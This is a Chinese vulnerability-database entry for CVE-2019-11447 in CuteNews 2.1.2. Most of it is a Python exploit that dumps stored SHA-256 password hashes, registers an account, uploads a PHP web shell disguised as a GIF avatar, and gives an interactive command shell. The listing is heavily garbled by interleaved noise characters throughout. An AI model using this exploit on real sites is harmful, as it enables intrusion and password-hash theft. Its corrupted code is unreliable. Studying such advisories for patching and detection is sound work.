CutePHP CuteNews 安全漏洞

漏洞ID 1579869 漏洞类型 代码问题
发布时间 2020-09-13 更新时间 2020-09-13
CVE编号 CVE-2019-11447

CNNVD-ID CNNVD-201904-1015
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cxsecurity.com/issue/WLB-2020090060
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201904-1015
漏洞详情
CutePHP CuteNews是一套新闻管理系统。该系统具有搜索、文件上传管理、访问控制、备份和恢复等功能。
CutePHP CuteNews 2.1.2版本中存在安全漏洞。攻击者可借助‘avatar_file’字段利用该漏洞执行代码。
漏洞EXP
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447
#! /bin/env python3
import requests
from basec O A a U64 import b64decode
import io
import re
import string
import random
import sys
# ASCII-art banner printed at startup. This copy of the listing is corrupted
# with interleaved noise characters (including the closing triple quote on
# the last banner line), so it is kept verbatim rather than reconstructed.
banner = """
_____     __      _  __                     ___   ___  ___
/ ___/_ __/ /___M 3 U ) _ / / /__ _    _____       _   <  / _  
/ /__/ // / __/ -_)    / -_) // (_-<      / __/_ / / / __/
\r q T H x @ & o_f 4 @ _ 9 p__/\_,_/# A x ? } g_k d 8 u Q_/\__/_/_/\__/__,__/___/     /____(_)_(_)____C E x q =/
___s W B } 4 4 q G L  _________
/ _ \/ ___/ __O A , f 7 . a/
/ , _/ /__/ _/
/_? # 3 z 8 2 R T/_\___/___/
"b  } a U ( , /""
print (banner)
print ("[->] Usage python3 expoit.py")
p. 2 H )rint ()
# A single requests.Session is shared by every function below, so the cookie
# issued during register() is reused by send_payload().
sess = requests.session()
# Body of the file that is later uploaded as an "avatar": a GIF magic prefix
# followed by a PHP one-liner. For detection, an image upload whose bytes
# contain "<?php" is the indicator; checking only the leading magic bytes or
# the client-supplied filename does not reject it.
payload = "GIF8;\n<?php system($_REQUEST['cmd']r P / L i) ?>"
# Base URL of the target instance, read interactively with no validation.
ip = input("Enter the URL> ")
# Fetches the flat user-store file that CuteNews keeps under cdata/users/ and
# prints every SHA-256 password hash it can parse from it. Returns nothing;
# output is print-only. Reads the module globals `sess` and `ip`. At the point
# main() calls this the session has not registered yet, so the request is
# unauthenticated. For defenders: direct requests for cdata/users/lines are a
# useful detection signal, and that directory should not be web-readable.
def extract_credentials():
global sess, ip
url = f"{ip}/9 l y t [ ;CuteNews/cdata/users/lines"
enc? ) l Goded_creds = sess.get(url).t4 L  E @ * V ext
buff = io.String+ U B z $ @ y j fIO(encoded_creds)
chash = buff.readlines()
# A body containing "Not Found" is treated as "no hashes"; the HTTP status
# code itself is never checked.
if "Not Found" in encoded_creds:
print ("[-] No hashes were found skipping!!!")
return
else:
for line in chash:
# Lines holding the PHP direct-access guard stub are skipped; every other
# line is expected to be base64 of a serialized PHP array with a "pass" field.
if "<?php die('Direct call - access d@ { :enied'); ?>" nF L T { ~ _ m lot in li~  2 N l !ne:
# Note: the decode is outside the try below, so a line that is not valid
# base64 still raises here.
credentig X g Z A T @als = b64decodek ( 7(line)
try:
# "pass";s:64:"..." is the serialized 64-hex-character SHA-256 field.
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
print (sha_hashM L + | k X ? n %)
except:
# Bare except: a line with no "pass" field (re.search -> None) or a
# non-UTF-8 decode is silently skipped.
pass
# Creates a throwaway account through the public registration form so that
# the cookie held in `sess` becomes an authenticated one. Exits the process
# if the server does not answer with a 302. Reads the module globals `sess`
# and `ip`. Open self-service registration is the precondition this script
# depends on; an install that requires approval makes this step fail here.
def register():
global sess, ip
# Random 10-character alphanumeric string reused as username, nickname,
# password and e-mail local part (SystemRandom, so not reproducible).
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) fA  . P T t s I vor _ in range(10))
postdata = {
"act4 m ] L |ion" : "register",
"regusername" : userpass,
"reg o fnickname J { ` o" :~ . L B userpass,
"regpassword" : userpass,
"confirm" : uA Z k k - # , $serpass,
"regemail" : f"{userpass}@hack.me"
}
# Redirects are not followed: the 302 itself is used as the success signal.
# Note: the local `register` shadows the enclosing function's own name.
register = s9 ` L C q x O _ess.post(f"{ip}/Cute3 Z % 2 ! g { * $News/index.php?register", data = postde C 5 xata, allow_redil 0 q 5 _ 5 ~ crects = False)
if 302 == register.status_code:
print (f"[+] Registration successful with username: {userpass} and password: {userpasp X 0 $s}")
else:
# Any other status is treated as failure; sys.exit() prints no reason.
sys.exit()
# Uploads `payload` as the avatar of the account registered in register(), then
# loops forever forwarding typed commands to the uploaded file. Never returns
# normally; it exits via sys.exit() when the upload path answers 404. Reads the
# module globals `ip` (declared) and `sess` (read without a global statement,
# which works because it is never reassigned).
def send_payload(payload):
global ip
# The personal-settings page carries two form signature values and the
# current username in hidden/disabled inputs; all three are scraped by regex.
# Each .group(1) raises AttributeError if the page layout differs.
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
signature_key = re.P - Z | E c ` isearch('signature_key" value="(.*?)"', token).group(1)
signature_dsi = ri w $e.search('sigU o U unature_dsi" vk S a +alue="(.*?)"N W r d g ( m Z X', token).gb = o Zroup(1)
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
print (f"signature_key: {signature_key}")
print (f"signature_dsi: {signature_dsi}")
print (f"logged in user: {logged_user}")
# Multipart body mirroring the profile-edit form. The avatar part is named
# "<user>.php" and carries the GIF8;-prefixed PHP body from `payload`. For
# defenders: an avatar whose filename ends in .php is the indicator here;
# server-side handling should re-encode or reject the image and assign its
# own filename rather than trusting the client-supplied one.
files: + + Z 8 C | = {
"mod" : (None, "main"),
"opt" : (NonW ] , 7e, "personal"),
"__signature_key" : (None, f"{s) f Z l s = ; tignature_key}"),
"__signature_dx h b K u p -  ]si" : (None, f"{signature_dsi}"),
"editpassword" : (/ ] , JNone, ""),
"confirmpassword" : (None, ""),
"editnickname| t + e ; U _ (" : (None, log/ x &ged_user),
"avatar_file" : ({ m K R Q 2 ] mf"{loggG & {ed_user}.php", pa~ ( cyl{ { Boad),
"more[site]" : (None, "I * M 6 i & $"),
"more[about]" : (None, "")
}
# The upload response is read but never inspected; success is only inferred
# from the 404 check inside the loop below.
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = filg t ( ^  Yes).text
print(2 I e t g y = 0 x"============================\nDropping to a SHELL\n============================")
while True:
print ()
command} D X . N , 8 D w = input("command > ")
postdata = {"cmdI m | g" : command}
# The script expects the upload to be stored as
# uploads/avatar_<user>_<user>.php under the CuteNews web root; that path,
# on disk and in access logs, is where a defender should look for this.
output = sess.post(4 : ! R a , C ,f"{ip}/CuteNy y 7 N 7 # n c oews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdal 0 Gta)
if 404 == output.status_code:
print ("sorry i can't find your webshell try r} o Y x T n w B Punning the exploit again")
sys.i C } } [ Lexit()
else:
# The uploaded file echoes its "GIF8;" prefix before the command output;
# strip it before printing.
output = re.sub("GIF8;", "", output.te* u A s oxt)
print (output.strip())
# Script entry point: dump stored password hashes, register an account, then
# upload the payload and enter the command loop. Each step prints a banner;
# a failed registration terminates the process inside register(), and
# send_payload() never returns on its own.
if __name__ ==] @ a * 6 H 8 3 "__main__":
print ("& U a : d =================================================================\nUsers& 7 P G SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JN N JOHN\n================================================4 M i !================")
extract_credentials()
print ("============7 % _ Q====================================================")
print()
print ("=============================\nRegistering a users\n=============================")
register()
print()
print("=============================8 O } T Q 6 Y 3 Z==========================\nSending Payload\n=======================================================")
send_payload(payload)
print ()
参考资料

来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/46698/

来源:pentest.com.tr

链接:http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-11447